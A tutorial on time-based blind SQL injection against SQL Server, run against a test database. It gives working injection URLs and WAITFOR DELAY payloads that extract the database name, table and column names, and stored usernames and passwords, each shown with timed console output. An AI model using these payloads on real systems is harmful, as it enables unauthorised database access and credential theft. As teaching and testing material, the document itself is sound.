0x01 Preface
Time-based injection on SQL Server is awkward: WAITFOR DELAY is a statement, not an expression, so it cannot be embedded inside a WHERE clause the way MySQL's SLEEP() can. The delay has to run as its own statement after the original query, i.e. at the very end of the SQL text.
That means the injection point must let you close the quoted value, append IF (condition) WAITFOR DELAY as a new statement, and comment out whatever the application appends after it with --.
If you cannot get waitfor delay '0:0:5' into that trailing position, this method does not apply.
0x02 Test data
1> select * from article;
2> go
+----+-------------+---------------+
| id | title       | content       |
+----+-------------+---------------+
|  1 | test title  | test content  |
|  2 | test title2 | test content2 |
+----+-------------+---------------+
(2 rows affected)

# Test table data: users
sql server> select * from users;
+----+--------------+----------+
| id | username     | password |
+----+--------------+----------+
|  1 | test-user-01 | 123456   |
|  2 | test-user-02 | 234567   |
+----+--------------+----------+
2 rows in set (0.00 sec)

sql server> SELECT system_user;
+--------+
| field1 |
+--------+
| sa     |
+--------+
1 row in set (0.00 sec)

sql server> select db_name();
+--------+
| field1 |
+--------+
| test   |
+--------+
1 row in set (0.00 sec)
0x03 Guessing the database name
Note: db_name() takes an optional database_id; passing a number returns the name of another database.
For example:
db_name() is the database the current connection is using
db_name(1) is the database with database_id 1
db_name(2) is the database with database_id 2
On SQL Server, ids 1 to 4 are always the system databases master, tempdb, model and msdb, so user databases normally start at db_name(5).
Web request: http://www.test.com/sql.php?id=1' IF(db_name() like '%test%') waitfor delay '0:0:5' -- a
Resulting SQL: select * from article WHERE id='1' IF(db_name() like '%test%') waitfor delay '0:0:5' -- a';
# Read the name of the current database
# Condition true (name matches): the response is delayed by about 5 seconds
1> SELECT * FROM article WHERE id = '1' IF (db_name() LIKE '%test%') WAITFOR DELAY '0:0:5' -- a';
2> go
+----+------------+--------------+
| id | title      | content      |
+----+------------+--------------+
|  1 | test title | test content |
+----+------------+--------------+
(1 rows affected) (5.064 sec)

# Condition false (no match): the query returns immediately
1> SELECT * FROM article WHERE id = '1' IF (db_name() LIKE '%aaaa%') WAITFOR DELAY '0:0:5' -- a';
2> go
+----+------------+--------------+
| id | title      | content      |
+----+------------+--------------+
|  1 | test title | test content |
+----+------------+--------------+
(1 rows affected) (0.04 sec)
0x04 Guessing table names
Note:
The table_name inside OVER(ORDER BY table_name) must be a column that actually exists in information_schema.tables
To target a different database, change the table_catalog filter
For example:
table_catalog=db_name() (the current database)
table_catalog='name of the database to query'
To walk through the tables, change the row number. Use row_number=N, not >=: the subquery must return exactly one value, otherwise SQL Server raises "Subquery returned more than 1 value" instead of evaluating the condition, and there is no delay either way.
For example:
row_number=1 for the first table
row_number=2 for the second table
Web request: http://www.test.com/sql.php?id=1' IF((select table_name from (select ROW_NUMBER() OVER(Order by table_name) AS row_number,table_name FROM information_schema.tables where table_catalog=db_name()) as a where row_number=1) like '%article%') waitfor delay '0:0:5' -- a
Resulting SQL: select * from article WHERE id='1' IF((select table_name from (select ROW_NUMBER() OVER(Order by table_name) AS row_number,table_name FROM information_schema.tables where table_catalog=db_name()) as a where row_number=1) like '%article%') waitfor delay '0:0:5' -- a';
# Read the first table of the current database
# Condition true
1> SELECT * FROM article WHERE id = '1' IF ((SELECT table_name FROM (SELECT ROW_NUMBER() OVER (ORDER BY table_name) AS row_number, table_name FROM information_schema.tables WHERE table_catalog = db_name()) AS a WHERE row_number = 1) LIKE '%article%') WAITFOR DELAY '0:0:5' -- a';
2> go
+----+------------+--------------+
| id | title      | content      |
+----+------------+--------------+
|  1 | test title | test content |
+----+------------+--------------+
(1 rows affected) (5.03 sec)

# Condition false
1> SELECT * FROM article WHERE id = '1' IF ((SELECT table_name FROM (SELECT ROW_NUMBER() OVER (ORDER BY table_name) AS row_number, table_name FROM information_schema.tables WHERE table_catalog = db_name()) AS a WHERE row_number = 1) LIKE '%bbbb%') WAITFOR DELAY '0:0:5' -- a';
2> go
+----+------------+--------------+
| id | title      | content      |
+----+------------+--------------+
|  1 | test title | test content |
+----+------------+--------------+
(1 rows affected) (0.05 sec)

# Read the second table of the current database
# Condition true
1> SELECT * FROM article WHERE id = '1' IF ((SELECT table_name FROM (SELECT ROW_NUMBER() OVER (ORDER BY table_name) AS row_number, table_name FROM information_schema.tables WHERE table_catalog = db_name()) AS a WHERE row_number = 2) LIKE '%users%') WAITFOR DELAY '0:0:5' -- a';
2> go
+----+------------+--------------+
| id | title      | content      |
+----+------------+--------------+
|  1 | test title | test content |
+----+------------+--------------+
(1 rows affected) (5.05 sec)

# Condition false
1> SELECT * FROM article WHERE id = '1' IF ((SELECT table_name FROM (SELECT ROW_NUMBER() OVER (ORDER BY table_name) AS row_number, table_name FROM information_schema.tables WHERE table_catalog = db_name()) AS a WHERE row_number = 2) LIKE '%aaaaaaa%') WAITFOR DELAY '0:0:5' -- a';
2> go
+----+------------+--------------+
| id | title      | content      |
+----+------------+--------------+
|  1 | test title | test content |
+----+------------+--------------+
(1 rows affected) (0.03 sec)
0x05 Guessing column names
Note:
The column_name inside OVER(ORDER BY column_name) must be a column that actually exists in information_schema.columns. Ordering by column_name numbers the columns alphabetically, not in the order they are defined in the table; ORDER BY ordinal_position gives the table's own order.
To target a different table, change the table_name filter
For example:
table_name='name of the table to query'
To walk through the columns, change the row number (again row_number=N, not >=, so the subquery returns a single value)
For example:
row_number=1 for the first column
row_number=2 for the second column
Web request: http://www.test.com/sql.php?id=1' IF((select column_name from (select ROW_NUMBER() OVER(Order by column_name) AS row_number,column_name from information_schema.columns where table_catalog=db_name() and table_name='users') as a where row_number=1) like '%id%') waitfor delay '0:0:5' -- a
Resulting SQL: select * from article WHERE id='1' IF((select column_name from (select ROW_NUMBER() OVER(Order by column_name) AS row_number,column_name from information_schema.columns where table_catalog=db_name() and table_name='users') as a where row_number=1) like '%id%') waitfor delay '0:0:5' -- a';
# Column list of the users table in the current database, as the subquery numbers it
1> SELECT * FROM (SELECT ROW_NUMBER() OVER (ORDER BY column_name) AS row_number, column_name FROM information_schema.columns WHERE table_catalog = db_name() AND table_name = 'users') AS a;
2> go
+------------+-------------+
| row_number | column_name |
+------------+-------------+
|          1 | id          |
|          2 | password    |
|          3 | username    |
+------------+-------------+
(3 rows affected)

# Read the first column of the users table in the current database
# Condition true
1> SELECT * FROM article WHERE id = '1' IF ((SELECT column_name FROM (SELECT ROW_NUMBER() OVER (ORDER BY column_name) AS row_number, column_name FROM information_schema.columns WHERE table_catalog = db_name() AND table_name = 'users') AS a WHERE row_number = 1) LIKE '%id%') WAITFOR DELAY '0:0:5' -- a';
2> go
+----+------------+--------------+
| id | title      | content      |
+----+------------+--------------+
|  1 | test title | test content |
+----+------------+--------------+
(1 rows affected) (5.077 sec)

# Condition false
1> SELECT * FROM article WHERE id = '1' IF ((SELECT column_name FROM (SELECT ROW_NUMBER() OVER (ORDER BY column_name) AS row_number, column_name FROM information_schema.columns WHERE table_catalog = db_name() AND table_name = 'users') AS a WHERE row_number = 1) LIKE '%aaaaaaaaa%') WAITFOR DELAY '0:0:5' -- a';
2> go
+----+------------+--------------+
| id | title      | content      |
+----+------------+--------------+
|  1 | test title | test content |
+----+------------+--------------+
(1 rows affected) (0.003 sec)

# Read the second column of the users table in the current database
# Condition true
1> SELECT * FROM article WHERE id = '1' IF ((SELECT column_name FROM (SELECT ROW_NUMBER() OVER (ORDER BY column_name) AS row_number, column_name FROM information_schema.columns WHERE table_catalog = db_name() AND table_name = 'users') AS a WHERE row_number = 2) LIKE '%password%') WAITFOR DELAY '0:0:5' -- a';
2> go
+----+------------+--------------+
| id | title      | content      |
+----+------------+--------------+
|  1 | test title | test content |
+----+------------+--------------+
(1 rows affected) (5.05 sec)

# Condition false
1> SELECT * FROM article WHERE id = '1' IF ((SELECT column_name FROM (SELECT ROW_NUMBER() OVER (ORDER BY column_name) AS row_number, column_name FROM information_schema.columns WHERE table_catalog = db_name() AND table_name = 'users') AS a WHERE row_number = 2) LIKE '%savasv%') WAITFOR DELAY '0:0:5' -- a';
2> go
+----+------------+--------------+
| id | title      | content      |
+----+------------+--------------+
|  1 | test title | test content |
+----+------------+--------------+
(1 rows affected) (0.03 sec)
0x06 Guessing row contents
Note:
The username inside OVER(ORDER BY username) must be a column that actually exists in the users table
To read a different column, change a.username in the request
For example:
the users table has the columns id, username, password
because the subquery is aliased as a, the other columns are read as
a.id, a.username, a.password
To walk through the rows, change the row number (row_number=N, not >=)
For example:
row_number=1 for the first row
row_number=2 for the second row
Web request: http://www.test.com/sql.php?id=1' IF((select a.username from (SELECT ROW_NUMBER() OVER (ORDER BY username) AS row_number, * from users) as a where row_number=1) like '%test-user-01%') waitfor delay '0:0:5' -- a
Resulting SQL: select * from article WHERE id='1' IF((select a.username from (SELECT ROW_NUMBER() OVER (ORDER BY username) AS row_number, * from users) as a where row_number=1) like '%test-user-01%') waitfor delay '0:0:5' -- a';
# Read the username column of the first row of users
# Condition true
1> SELECT * FROM article WHERE id = '1' IF ((SELECT a.username FROM (SELECT ROW_NUMBER() OVER (ORDER BY username) AS row_number, * FROM users) AS a WHERE row_number = 1) LIKE '%test-user-01%') WAITFOR DELAY '0:0:5' -- a';
2> go
+----+------------+--------------+
| id | title      | content      |
+----+------------+--------------+
|  1 | test title | test content |
+----+------------+--------------+
(1 rows affected) (5.07 sec)

# Condition false
1> SELECT * FROM article WHERE id = '1' IF ((SELECT a.username FROM (SELECT ROW_NUMBER() OVER (ORDER BY username) AS row_number, * FROM users) AS a WHERE row_number = 1) LIKE '%aaaaaa%') WAITFOR DELAY '0:0:5' -- a';
2> go
+----+------------+--------------+
| id | title      | content      |
+----+------------+--------------+
|  1 | test title | test content |
+----+------------+--------------+
(1 rows affected) (0.07 sec)

# Read the password column of the second row of users
# Condition true
1> SELECT * FROM article WHERE id = '1' IF ((SELECT a.password FROM (SELECT ROW_NUMBER() OVER (ORDER BY username) AS row_number, * FROM users) AS a WHERE row_number = 2) LIKE '%234567%') WAITFOR DELAY '0:0:5' -- a';
2> go
+----+------------+--------------+
| id | title      | content      |
+----+------------+--------------+
|  1 | test title | test content |
+----+------------+--------------+
(1 rows affected) (5.06 sec)

# Condition false
1> SELECT * FROM article WHERE id = '1' IF ((SELECT a.password FROM (SELECT ROW_NUMBER() OVER (ORDER BY username) AS row_number, * FROM users) AS a WHERE row_number = 2) LIKE '%aascacascsac%') WAITFOR DELAY '0:0:5' -- a';
2> go
+----+------------+--------------+
| id | title      | content      |
+----+------------+--------------+
|  1 | test title | test content |
+----+------------+--------------+
(1 rows affected) (0.06 sec)
